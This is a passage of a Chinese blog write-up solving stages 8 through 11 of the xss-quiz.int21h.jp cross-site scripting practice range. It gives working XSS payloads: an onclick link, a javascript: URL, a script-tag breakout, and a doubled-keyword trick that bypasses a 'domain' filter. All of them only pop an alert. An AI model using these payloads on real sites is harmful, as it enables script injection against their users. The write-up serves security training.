<p><a href="http://xss-quiz.int21h.jp/stage008.php?sid=70322e70a57d90eec3e9a1bc36434f4c4f652490#">http://xss-quiz.int21h.jp/stage008.php?sid=70322e70a57d90eec3e9a1bc36434f4c4f652490#</a></p>
<p>分析 :  输入的内容会转化为连接，的形式显示在页面中</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115182430680.png">
            <img class="mx-auto" alt="image-20210115182430680" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115182430680.png" />
        </a>
    </p>
<p>payload 因此最简单的方式直接更改a连接，添加事件直接弹窗，但是与题意不符</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-html" data-lang="html">&lt;<span style="color:#000080">a</span> <span style="color:#008080">href</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;#&#34;</span> <span style="color:#008080">onclick</span><span style="color:#000;font-weight:bold">=</span><span style="color:#d14">&#34;alert(document.domain)&#34;</span>&gt;rgfre&lt;/<span style="color:#000080">a</span>&gt;
</code></pre></td></tr></table>
</div>
</div><p>payload 方法二，直接在输入框中输入：</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js">  javascript<span style="color:#000;font-weight:bold">:</span>alert(<span style="color:#0086b3">document</span>.domain);
</code></pre></td></tr></table>
</div>
</div><p>之后点击连接即可</p>
<blockquote>
<ul>
<li>
<p><strong>javascript:是表示在触发默认动作时，执行一段JavaScript代码，</strong></p>
</li>
<li>
<p>javascript:; 表示什么都不执行，这样点击时就没有任何反应。</p>
</li>
<li>
<p><!-- raw HTML omitted --><!-- raw HTML omitted -->  点击后是不会跳转的，一般用于开发时页面还未完成。</p>
</li>
<li>
<p>&lt;  a href=&ldquo;javascript：void(0);&rdquo;   &gt;test &lt;  / a&gt;</p>
<p>javascript:void(0) 表示一个死链接，执行空事件。</p>
</li>
</ul>
</blockquote>
<h3 id="第九关">第九关</h3>
<p>使用uft-7  浏览器无法支支持，直接在控制台输入 alert（document.domain）； 跳过</p>
<h3 id="第十关">第十关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage00010.php?sid=590ef187bc935b11e128483093f6d970cdb0f850">http://xss-quiz.int21h.jp/stage00010.php?sid=590ef187bc935b11e128483093f6d970cdb0f850</a></p>
<p>同样的结构直接测试</p>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4">
<table style="border-spacing:0;padding:0;margin:0;border:0;width:auto;overflow:auto;display:block;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code><span style="margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-js" data-lang="js"><span style="color:#a61717;background-color:#e3d2d2">&#34;</span><span style="color:#000;font-weight:bold">&gt;&lt;</span>script<span style="color:#000;font-weight:bold">&gt;</span>alert(<span style="color:#0086b3">document</span>.domain)<span style="color:#000;font-weight:bold">&lt;</span><span style="color:#a61717;background-color:#e3d2d2">/script&gt;</span>
</code></pre></td></tr></table>
</div>
</div><p>其结果为</p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115203030751.png">
            <img class="mx-auto" alt="image-20210115203030751" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115203030751.png" />
        </a>
    </p>
<p>
        <a data-fancybox="gallery" href="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115203030751.png">
            <img class="mx-auto" alt="" src="https://gitee.com/gitmatrix/images/raw/master/img/image-20210115203030751.png" />
        </a>
    </p>
<p>由此可以看出，程序直接屏蔽了domain, 所以我们多次尝试不同的重复domain组合</p>
<p>payload</p>
<pre><code class="language-jd" data-lang="jd">&quot;&gt;&lt;script&gt;alert(document.ddomainomain)&lt;/script&gt;
</code></pre><h3 id="第十一关">第十一关</h3>
<p><a href="http://xss-quiz.int21h.jp/stage11th.php?sid=955114a2b61e6ebfafeb67e8454500bfec9eab63">http://xss-quiz.int21h.jp/stage11th.php?sid=955114a2b61e6ebfafeb67e8454500bfec9eab63</a></p>

        </div>

        


        

<div class="post-archive">
    <h2>See Also</h2>
    <ul class="listing">
        
        <li><a href="/post/top-10-%E6%BC%8F%E6%B4%9E%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0%E7%AC%94%E8%AE%B0/XSS-%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/">XSS 靶场练习 </a></li>
        
        <li><a href="/post/OWASP-10/XSS-%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB/">XSS 跨站脚本漏洞 </a></li>
        
        <li><a href="/post/OWASP-10/CSRF-%E8%B7%A8%E7%AB%99%E8%AF%B7%E6%B1%82%E4%BC%AA%E9%80%A0/">CSRF 跨站请求伪造 </a></li>
        
        <li><a href="/post/OWASP-10/Chrome-%E6%8F%92%E4%BB%B6/">Chrome 插件 </a></li>
        
        <li><a href="/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/Google-hacking/">Google hacking </a></li>
        
    </ul>
</div>


        <div class="post-meta meta-tags">
            
            <ul class="clearfix">
                
                <li><a href='/tags/XSS'>XSS</a></li>
                
                <li><a href='/tags/%E9%9D%B6%E5%9C%BA'>靶场</a></li>
                
            </ul>
            
        </div>
    </article>
    
    

    
    
</div>

                    <footer id="footer">
    <div>
        &copy; 2021 <a href="https://gitmatrix.gitee.io/">matrix By matrix</a>
        
    </div>
    <br />
    
    <div>
        <div class="github-badge">
            <a href="https://gohugo.io/" target="_black" rel="nofollow"><span class="badge-subject">Powered by</span><span class="badge-value bg-blue">Hugo</span></a>
        </div>
        
        <div class="github-badge">
            <a href="https://github.com/flysnow-org/maupassant-hugo" target="_black"><span class="badge-subject">Theme</span><span class="badge-value bg-yellowgreen">Maupassant</span></a>
        </div>
    </div>
</footer>


    
    <script type="text/javascript">
        window.MathJax = {
            tex2jax: {
                inlineMath: [['$', '$']],
                processEscapes: true
                }
            };
    </script>
    <script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script><script src="https://cdn.bootcdn.net/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>

<a id="rocket" href="#top"></a>
<script type="text/javascript" src='/js/totop.js?v=0.0.0' async=""></script>



    <script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>




    <script src='/js/douban.js'></script>

                </div>

                <div id="secondary">
    <section class="widget">
        <form id="search" action='https://gitmatrix.gitee.io/search/' method="get" accept-charset="utf-8" target="_blank" _lpchecked="1">
      
      <input type="text" name="q" maxlength="20" placeholder="Search">
      <input type="hidden" name="sitesearch" value="https://gitmatrix.gitee.io/">
      <button type="submit" class="submit icon-search"></button>
</form>
    </section>
    
    <section class="widget">
        <h3 class="widget-title">最近文章</h3>
<ul class="widget-list">
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/" title="Linux 基础配置 ">Linux 基础配置 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/linux-%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4-/" title="Linux 常用命令 ">Linux 常用命令 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/Linux%E6%96%87%E4%BB%B6%E7%89%B9%E6%AE%8A%E6%9D%83%E9%99%90SUIDSGID%E4%B8%8ESBIT/" title="Linux文件特殊权限 ">Linux文件特殊权限 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/Linux-%E7%A3%81%E7%9B%98%E6%8C%82%E8%BD%BD/" title="Liunx 磁盘分区与文件挂载 ">Liunx 磁盘分区与文件挂载 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/my.cnf-%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6%E8%AF%A6%E8%A7%A3/" title="my.cnf 配置文件详解">my.cnf 配置文件详解</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/Mysql-%E6%93%8D%E4%BD%9C/" title="Mysql 基本操作">Mysql 基本操作</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Mysql-%E6%95%B0%E6%8D%AE%E5%BA%93/Mysql%E4%BD%93%E7%B3%BB%E7%BB%93%E6%9E%84%E7%AE%A1%E7%90%86/" title="Mysql体系结构管理">Mysql体系结构管理</a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/RAID-%E7%A3%81%E7%9B%98%E9%98%B5%E5%88%97/" title="RAID 磁盘阵列配置 ">RAID 磁盘阵列配置 </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/Linux-%E5%9F%BA%E7%A1%80%E9%85%8D%E7%BD%AE/rpm-%E4%B8%8E-yum-/" title="RPM 与 Yum ">RPM 与 Yum </a>
    </li>
    
    <li>
        <a href="https://gitmatrix.gitee.io/post/SSH/SSH-%E5%9F%BA%E6%9C%AC%E6%93%8D%E4%BD%9C/" title="SSH 基本操作">SSH 基本操作</a>
    </li>
    
</ul>
    </section>

    
<section class="widget">
    <h3 class="widget-title" style="color:#6E718A">课程直达</h3>
    <ul class="widget-list">
        
        <li>
            <a href="https://www.bilibili.com/video/BV1nA411h7C9" title="Burpsuite使用教程" target="_blank" style="color:#6E718A">
                
                    <img src="https://gitee.com/gitmatrix/images/raw/master/img/20210116152721.png">
                
            </a>
        </li>
        
        <li>
            <a href="https://www.bilibili.com/video/BV1yf4y1i7Pb?p=1" title="网络安全提升技术与渗透测试原理深度解析" target="_blank" style="color:#6E718A">
                
                    <img src="https://gitee.com/gitmatrix/images/raw/master/img/6f19fe2958f4d3c5edaee825cda334bac074abc8.jpg">
                
            </a>
        </li>
        
    </ul>
</section>


    <section class="widget">
        <h3 class="widget-title"><a href='/categories/'>分类</a></h3>
<ul class="widget-list">
    
    <li><a href="https://gitmatrix.gitee.io/categories/Liunx/">Liunx (6)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Mysql/">Mysql (3)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/SSH/">SSH (4)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Test/">Test (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/Web-%E5%AE%89%E5%85%A8/">Web 安全 (9)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/web%E5%9F%BA%E7%A1%80/">web基础 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集 (10)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E5%8D%81%E5%A4%A7%E6%BC%8F%E6%B4%9E/">十大漏洞 (8)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E6%95%99%E7%A8%8B/">教程 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/">网络安全法 (1)</a></li>
    
    <li><a href="https://gitmatrix.gitee.io/categories/%E8%BF%90%E7%BB%B4/">运维 (2)</a></li>
    
</ul>
    </section>

    <section class="widget">
        <h3 class="widget-title"><a href='/tags/'>标签</a></h3>
<div class="tagcloud">
    
    <a href="https://gitmatrix.gitee.io/tags/CSRF/">CSRF</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Chrome-Extension/">Chrome Extension</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Chrome%E6%8F%92%E4%BB%B6/">Chrome插件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Google-hacking/">Google hacking</a>
    
    <a href="https://gitmatrix.gitee.io/tags/JavaScript/">JavaScript</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Linux/">Linux</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Mysql/">Mysql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Payload/">Payload</a>
    
    <a href="https://gitmatrix.gitee.io/tags/XSS/">XSS</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Zabbix/">Zabbix</a>
    
    <a href="https://gitmatrix.gitee.io/tags/js/">js</a>
    
    <a href="https://gitmatrix.gitee.io/tags/Mysql/">Mysql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/sql/">sql</a>
    
    <a href="https://gitmatrix.gitee.io/tags/ssh/">ssh</a>
    
    <a href="https://gitmatrix.gitee.io/tags/test/">test</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E4%B8%AD%E5%8D%8E%E4%BA%BA%E6%B0%91%E5%85%B1%E5%92%8C%E5%9B%BD%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%B3%95/">中华人民共和国网络安全法</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">基本信息收集</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%8C%87%E7%BA%B9%E8%AF%86%E5%88%AB/">指纹识别</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%B6%E9%9B%86%E5%AD%90%E5%9F%9F%E4%BF%A1%E6%81%AF/">收集子域信息</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%B6%E9%9B%86%E6%95%8F%E6%84%9F%E7%9B%AE%E5%BD%95%E6%96%87%E4%BB%B6/">收集敏感目录文件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%94%BB%E5%87%BB/">攻击</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%95%99%E7%A8%8B/">教程</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%95%B4%E7%AB%99%E5%88%86%E6%9E%90/">整站分析</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%96%87%E4%BB%B6/">文件</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%BB%8B%E7%BB%8D/">渗透测试介绍</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E6%B5%81%E7%A8%8B/">渗透测试流程</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E6%BC%8F%E6%B4%9E/">漏洞</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E7%9C%9F%E5%AE%9EIP%E5%9C%B0%E5%9D%80%E6%9F%A5%E8%AF%A2/">真实IP地址查询</a>
    
    <a href="https://gitmatrix.gitee.io/tags/%E9%9D%B6%E5%9C%BA/">靶场</a>
    
</div>
    </section>

    
<section class="widget">
    <h3 class="widget-title">友情链接</h3>
    <ul class="widget-list">
        
        <li>
            <a target="_blank" href="https://www.bugbank.cn/" title="漏洞银行">漏洞银行</a>
        </li>
        
        <li>
            <a target="_blank" href="https://www.xf1433.com/59.html" title="电脑黑客书籍在线阅读">电脑黑客书籍在线阅读</a>
        </li>
        
        <li>
            <a target="_blank" href="http://yuedu.baidu.com/ebook/14a722970740be1e640e9a3e" title="Android Gradle权威指南">Android Gradle权威指南</a>
        </li>
        
    </ul>
</section>


    <section class="widget">
        <h3 class="widget-title">其它</h3>
        <ul class="widget-list">
            <li><a href="https://gitmatrix.gitee.io/index.xml"></a></li>
        </ul>
    </section>
</div>
            </div>
        </div>
    </div>
</body>

</html>